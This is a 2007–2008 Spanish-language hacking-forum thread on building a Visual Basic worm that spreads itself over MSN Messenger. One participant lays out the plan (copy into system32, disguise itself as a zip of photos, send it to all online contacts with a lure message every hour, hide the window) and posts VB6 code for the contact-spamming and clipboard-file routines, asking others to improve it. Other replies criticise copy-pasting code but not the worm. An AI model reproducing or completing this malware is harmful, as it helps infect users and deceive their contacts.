elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Enviar archivos automaticamente por el msn
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Enviar archivos automaticamente por el msn  (Leído 4,067 veces)
HALC12

Desconectado Desconectado

Mensajes: 67



Ver Perfil
Enviar archivos automaticamente por el msn
« en: 2 Octubre 2007, 02:13 am »

Hola que mas
pues si mi duda es como funcionan los virus que se autoenvian por el msn , esos como foto_celular ya que he buscado y no encontrado nada no se se sien vb tal ves se pueda hacer un programa que haga esto
gracias si  me pueden ayudar
Bien


HALC


En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Enviar archivos automaticamente por el msn
« Respuesta #1 en: 2 Octubre 2007, 16:08 pm »

Citar
Hola que mas
pues si mi duda es como funcionan los virus que se autoenvian por el msn , esos como foto_celular ya que he buscado y no encontrado nada no se se sien vb tal ves se pueda hacer un programa que haga esto
gracias si  me pueden ayudar
Bien
Has buscado? :¬¬ :xD.
Anda, mirate esto


En línea

A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: Enviar archivos automaticamente por el msn
« Respuesta #2 en: 2 Octubre 2007, 16:32 pm »

Man estamos en las mismas... Yo tambien me ando creando un Worm que se multiplique por msn.

Mi idea es esta...
Al ejecutar el worm se copia en c:\windows\system32 y tambien se zipea automaticamente con el nombre DSC1504 <--- Aun no se como hacer eso
junto con varias imagenes y se guarda en c:\windows\media o alguna carpeta medio oculta, este sera el archivo que mandaremos via MSN!

Despues abre cada una de las ventanas de la lista de contactos que esten en Online o cualquier otro estado que no sea "NO CONECTADO".

Le manda el archivo zipeado anteriormente y le dice "Ey, aqui estan las fotos de la semana pasada" o algun tipo de mensajes, estaria bien que se escogiera al azar el mensaje de una lista determinada. <----- Tampoco se como hacerlo al azar

Despues oculta la ventana con la funcion
Call ShowWindow(GetForegroundWindow, SW_HIDE)

El proceso de mandar el archivo a los contactos se repite cada 1 hora.
Saludos!....


Si alguien sabe como agregar una imagen a un archivo hecho en vb y que ademas las imagenes se guarden en .zip al ejecutarlo favor de publicarlo, yo le comparto el kilombo del codigo que estoy formando xD


En línea

Hackeo, luego existo...
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: Enviar archivos automaticamente por el msn
« Respuesta #3 en: 2 Octubre 2007, 17:37 pm »

Esto es lo que llevo de code....
Cabe mencionar que todo es producto de los demas xD yo solo voy juntando codigo que me sirve...
DERECHOS RESERVADOS A TODO MUNDO :xD

Código:
Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)

Dim x As Integer
 'Función Api FindWindow para buscar el HWND
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" ( _
    ByVal lpClassName As String, _
    ByVal lpWindowName As String) As Long

'Función ShowWindow para maximizar , minimizar etc..
Private Declare Function ShowWindow Lib "user32" ( _
    ByVal hWnd As Long, _
    ByVal nCmdShow As Long) As Long

'Constantes para el api ShowWindow
Const SW_HIDE = 0
Const SW_NORMAL = 1

Dim Handle As Long
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

Const KEYEVENTF_KEYUP = &H2
Const VK_LWIN = &H5B

Private Sub Wait(ByVal nSec As Integer)
Dim t1 As Date, t2 As Date

t1 = Second(Now)
t2 = t1 + nSec

Do
    DoEvents
Loop While t2 > Second(Now)
End Sub

Sub msninfect()
On Error Resume Next
Set w = CreateObject("Messenger.UIAutomation")
For Each ConTacto In w.MyContacts 'Vamos de contacto en contacto
If (ConTacto.Status = 2) Or (ConTacto.Status = 10) Or (ConTacto.Status = 14) Or (ConTacto.Status = 34) Or (ConTacto.Status = 50) Or (ConTacto.Status = 66) Then
Set iMsn = w.InstantMessage(ConTacto.SigninName)
SendKeys "hola"
SendKeys "{ENTER}"
    Call ShowWindow(GetForegroundWindow, SW_HIDE)
    Wait (4)
End If

Next
Call keybd_event(VK_LWIN, 0, 0, 0)
Call keybd_event(77, 0, 0, 0)
Call keybd_event(VK_LWIN, 0, KEYEVENTF_KEYUP, 0)
End Sub

Sub newpropMSN()
Dim ap(0) As String
'FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Worm.exe" ' Nos Copiamos
ap(0) = "C:\fotos.zip"
If ClipboardCopyFiles(ap) = True Then ' Nos ponemos en el Portapapeles
End If
Wait (1) ' Esperamos 1 respiro al procesador...
msninfect ' Llamamos a la funcion de la propagación
End Sub

Private Sub Form_Load()
End Sub


Private Sub Constant_Timer()
 
'Pones a este timer un intervalo de 60000 que equivale a 1 minuto
If x = 60 Then 'cuando la variable valga 15
    Call msninfect 'ejecutamos la accion
    x = 0 'reiniciamos la variable
Else
    x = x + 1 'sumamos uno a la variable si aún no ha llegado a 15
End If
 
End Sub

Cada hora estara mandando un mensaje a todos los contactos y se ocultara la pantalla.....


Ayuden a mejorar el code!
Saludos

NOTA: En un modulo va esto:

Código:
Option Explicit

' Required data structures
Private Type POINTAPI
x As Long
y As Long
End Type

' Clipboard Manager Functions
Private Declare Function EmptyClipboard Lib "user32" () As Long
Private Declare Function OpenClipboard Lib "user32" (ByVal hWnd As Long) As Long
Private Declare Function CloseClipboard Lib "user32" () As Long
Private Declare Function SetClipboardData Lib "user32" (ByVal wFormat As Long, ByVal hMem As Long) As Long
Private Declare Function GetClipboardData Lib "user32" (ByVal wFormat As Long) As Long
Private Declare Function IsClipboardFormatAvailable Lib "user32" (ByVal wFormat As Long) As Long

' Other required Win32 APIs
Private Declare Function DragQueryFile Lib "shell32.dll" Alias "DragQueryFileA" (ByVal hDrop As Long, ByVal UINT As Long, ByVal lpStr As String, ByVal ch As Long) As Long
Private Declare Function DragQueryPoint Lib "shell32.dll" (ByVal hDrop As Long, lpPoint As POINTAPI) As Long
Private Declare Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As Long) As Long
Private Declare Function GlobalFree Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Function GlobalLock Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Function GlobalUnlock Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Sub CopyMem Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)

' Predefined Clipboard Formats
Private Const CF_TEXT = 1
Private Const CF_BITMAP = 2
Private Const CF_METAFILEPICT = 3
Private Const CF_SYLK = 4
Private Const CF_DIF = 5
Private Const CF_TIFF = 6
Private Const CF_OEMTEXT = 7
Private Const CF_DIB = 8
Private Const CF_PALETTE = 9
Private Const CF_PENDATA = 10
Private Const CF_RIFF = 11
Private Const CF_WAVE = 12
Private Const CF_UNICODETEXT = 13
Private Const CF_ENHMETAFILE = 14
Private Const CF_HDROP = 15
Private Const CF_LOCALE = 16
Private Const CF_MAX = 17

' New shell-oriented clipboard formats
Private Const CFSTR_SHELLIDLIST As String = "Shell IDList Array"
Private Const CFSTR_SHELLIDLISTOFFSET As String = "Shell Object Offsets"
Private Const CFSTR_NETRESOURCES As String = "Net Resource"
Private Const CFSTR_FILEDESCRIPTOR As String = "FileGroupDescriptor"
Private Const CFSTR_FILECONTENTS As String = "FileContents"
Private Const CFSTR_FILENAME As String = "FileName"
Private Const CFSTR_PRINTERGROUP As String = "PrinterFriendlyName"
Private Const CFSTR_FILENAMEMAP As String = "FileNameMap"

' Global Memory Flags
Private Const GMEM_FIXED = &H0
Private Const GMEM_MOVEABLE = &H2
Private Const GMEM_NOCOMPACT = &H10
Private Const GMEM_NODISCARD = &H20
Private Const GMEM_ZEROINIT = &H40
Private Const GMEM_MODIFY = &H80
Private Const GMEM_DISCARDABLE = &H100
Private Const GMEM_NOT_BANKED = &H1000
Private Const GMEM_SHARE = &H2000
Private Const GMEM_DDESHARE = &H2000
Private Const GMEM_NOTIFY = &H4000
Private Const GMEM_LOWER = GMEM_NOT_BANKED
Private Const GMEM_VALID_FLAGS = &H7F72
Private Const GMEM_INVALID_HANDLE = &H8000
Private Const GHND = (GMEM_MOVEABLE Or GMEM_ZEROINIT)
Private Const GPTR = (GMEM_FIXED Or GMEM_ZEROINIT)

Private Type DROPFILES
pFiles As Long
pt As POINTAPI
fNC As Long
fWide As Long
End Type


Public Function ClipboardCopyFiles(Files() As String) As Boolean

Dim data As String
Dim df As DROPFILES
Dim hGlobal As Long
Dim lpGlobal As Long
Dim i As Long

' Open and clear existing crud off clipboard.
If OpenClipboard(0&) Then
Call EmptyClipboard

' Build double-null terminated list of files.
For i = LBound(Files) To UBound(Files)
data = data & Files(i) & vbNullChar
Next
data = data & vbNullChar

' Allocate and get pointer to global memory,
' then copy file list to it.
hGlobal = GlobalAlloc(GHND, Len(df) + Len(data))
If hGlobal Then
lpGlobal = GlobalLock(hGlobal)

' Build DROPFILES structure in global memory.
df.pFiles = Len(df)
Call CopyMem(ByVal lpGlobal, df, Len(df))
Call CopyMem(ByVal (lpGlobal + Len(df)), ByVal data, Len(data))
Call GlobalUnlock(hGlobal)

' Copy data to clipboard, and return success.
If SetClipboardData(CF_HDROP, hGlobal) Then
ClipboardCopyFiles = True
End If
End If

' Clean up
Call CloseClipboard
End If

End Function
En línea

Hackeo, luego existo...
HALC12

Desconectado Desconectado

Mensajes: 67



Ver Perfil
Re: Enviar archivos automaticamente por el msn
« Respuesta #4 en: 11 Octubre 2007, 02:48 am »

GRA CIAS Ado's_Xtreme 
ho habia tenido tiempo de rvisar el codigo pero mas  tarde me pondre en eso vere si lo puedo mejorar
te avisare
En línea

Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: Enviar archivos automaticamente por el msn
« Respuesta #5 en: 11 Octubre 2007, 11:49 am »

Cabe mencionar que todo es producto de los demas xD yo solo voy juntando codigo que me sirve...

Eso es lo mas triste, y por desgracia lo mas comun..... :-\ :-\
En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
invisible_hack


Desconectado Desconectado

Mensajes: 978


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: Enviar archivos automaticamente por el msn
« Respuesta #6 en: 12 Octubre 2007, 03:06 am »

Si vas copiando y pegando "trozos" de kodigos pues posiblemente al final no te funcione correctamente....ya que todas las partes deben de estar entrelazadas, no sé si se me entiende lo que quiero decir....

Bye!!
En línea

"Si no visitas mi blog, Chuck te dará una patada giratoria"
zXxOsirisxXz

Desconectado Desconectado

Mensajes: 50



Ver Perfil
Re: Enviar archivos automaticamente por el msn
« Respuesta #7 en: 12 Octubre 2007, 04:41 am »

Claro k para hacer eso de copiar y pegar, ahik sabes, k se esta copiadno y pegando. Me refiero a entender el codigo, aun k no sea 100% tuyo, ya k bueno, de algun lado se aprende.. pero, k almenos aprenda alguito, k poco a poco lo puedas hacer tu mismo.
En línea

Zaraki_lkenpachi

Desconectado Desconectado

Mensajes: 54



Ver Perfil
Re: Enviar archivos automaticamente por el msn
« Respuesta #8 en: 21 Julio 2008, 10:47 am »

Creo que eso de estar copiando y pegando codigo es de un lammer segun lei en la Etica del Hacker xD tmr yo me leido muchas cosas y ahora toy aprendiendo VBS y Batch bueno de Algo se empieza  :rolleyes: Saludos  :xD date tu tiempito y ponte a aprender como yo  :xD :xD :xD Bye !! Claro aunque ese Code lo entiendo un poco mas me interesa conocer informacion de esas API's
En línea


Zaraki_lkenpachi

Desconectado Desconectado

Mensajes: 54



Ver Perfil
Re: Enviar archivos automaticamente por el msn
« Respuesta #9 en: 21 Julio 2008, 10:48 am »

Waaaa disculpenme me despedi como 2 veces con el Saludos / Bye ... Lo que pasa es que estoy con sueño y no se ni lo que escribo  :-[

Ahora Si Chao !!  :laugh:
En línea


Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Utilidad para enviar automaticamente de manera cifrada archivos windows -> linux
Seguridad
DrKillador 1 2,353 Último mensaje 30 Diciembre 2012, 12:56 pm
por DrKillador
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines